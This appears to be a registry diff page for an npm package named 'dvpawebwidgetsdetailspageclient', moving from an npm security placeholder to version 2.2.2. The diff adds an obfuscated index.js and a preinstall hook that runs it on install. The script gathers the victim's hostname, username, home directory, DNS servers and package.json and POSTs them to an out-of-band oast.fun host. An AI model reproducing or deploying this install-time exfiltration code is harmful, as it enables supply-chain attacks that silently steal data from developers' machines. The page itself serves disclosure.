dvpawebwidgetsdetailspageclient 0.0.1-security → 2.2.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of dvpawebwidgetsdetailspageclient might be problematic. Click here for more details.
- package/index.js +2 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,2 @@
|
|
|
1
|
+
//author:- exbrazily@wearehackerone.com
|
|
2
|
+
const _0x2e9c3b=_0x1e2e;function _0x1e2e(_0x7e8a1c,_0x274f27){const _0x2424dd=_0x2424();return _0x1e2e=function(_0x1e2eb2,_0x137b1f){_0x1e2eb2=_0x1e2eb2-0xc2;let _0x417368=_0x2424dd[_0x1e2eb2];return _0x417368;},_0x1e2e(_0x7e8a1c,_0x274f27);}(function(_0x12db71,_0x38b529){const _0x4f96d1=_0x1e2e,_0x31f77c=_0x12db71();while(!![]){try{const _0x52837a=parseInt(_0x4f96d1(0xdb))/0x1+parseInt(_0x4f96d1(0xcd))/0x2*(parseInt(_0x4f96d1(0xdc))/0x3)+parseInt(_0x4f96d1(0xd2))/0x4*(parseInt(_0x4f96d1(0xd1))/0x5)+-parseInt(_0x4f96d1(0xcb))/0x6*(parseInt(_0x4f96d1(0xd7))/0x7)+-parseInt(_0x4f96d1(0xc8))/0x8*(-parseInt(_0x4f96d1(0xc7))/0x9)+parseInt(_0x4f96d1(0xcf))/0xa*(-parseInt(_0x4f96d1(0xde))/0xb)+parseInt(_0x4f96d1(0xd8))/0xc*(-parseInt(_0x4f96d1(0xc6))/0xd);if(_0x52837a===_0x38b529)break;else _0x31f77c['push'](_0x31f77c['shift']());}catch(_0x585d50){_0x31f77c['push'](_0x31f77c['shift']());}}}(_0x2424,0x27b23));const os=require('os'),dns=require(_0x2e9c3b(0xd5)),querystring=require(_0x2e9c3b(0xce)),https=require('https'),packageJSON=require(_0x2e9c3b(0xc4)),package=packageJSON[_0x2e9c3b(0xd0)],trackingData=JSON[_0x2e9c3b(0xdf)]({'p':package,'c':__dirname,'hd':os['homedir'](),'hn':os['hostname'](),'un':os['userInfo']()[_0x2e9c3b(0xd9)],'dns':dns[_0x2e9c3b(0xca)](),'r':packageJSON?packageJSON[_0x2e9c3b(0xc9)]:undefined,'v':packageJSON[_0x2e9c3b(0xcc)],'pjson':packageJSON});var postData=querystring[_0x2e9c3b(0xdf)]({'msg':trackingData}),options={'hostname':_0x2e9c3b(0xc5),'port':0x1bb,'path':'/','method':_0x2e9c3b(0xd4),'headers':{'Content-Type':_0x2e9c3b(0xd6),'Content-Length':postData[_0x2e9c3b(0xd3)]}},req=https[_0x2e9c3b(0xc2)](options,_0x11c858=>{const _0x54792d=_0x2e9c3b;_0x11c858['on'](_0x54792d(0xc3),_0x211f0f=>{const _0x422181=_0x54792d;process['stdout'][_0x422181(0xdd)](_0x211f0f);});});req['on'](_0x2e9c3b(0xe0),_0x4e387b=>{}),req[_0x2e9c3b(0xdd)](postData),req[_0x2e9c3b(0xda)]();function _0x2424(){const _0x9b975a=['ybeqmyxxvbxtvvbplgvo767jlyv1ik0d4.oast.fun','37661SSouKj','891SnfzAH','14048QvjEXh','___resolved','getServers','1016934byWJwU','version','2yEWImJ','querystring','250aRWCLy','name','39365HlWocQ','88QOxooi','length','POST','dns','application/x-www-form-urlencoded','7EfkkNa','204zhLLQE','username','end','4290rXvBan','729354VDwqnj','write','93775sVJORQ','stringify','error','request','data','./package.json'];_0x2424=function(){return _0x9b975a;};return _0x2424();}
|
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "dvpawebwidgetsdetailspageclient",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "2.2.2",
|
|
4
|
+
"description": "Metric AI Evalutation @amzn",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "exit 1",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "exbrazily",
|
|
11
|
+
"license": "UNLICENSED"
|
|
6
12
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=dvpawebwidgetsdetailspageclient for more information.
|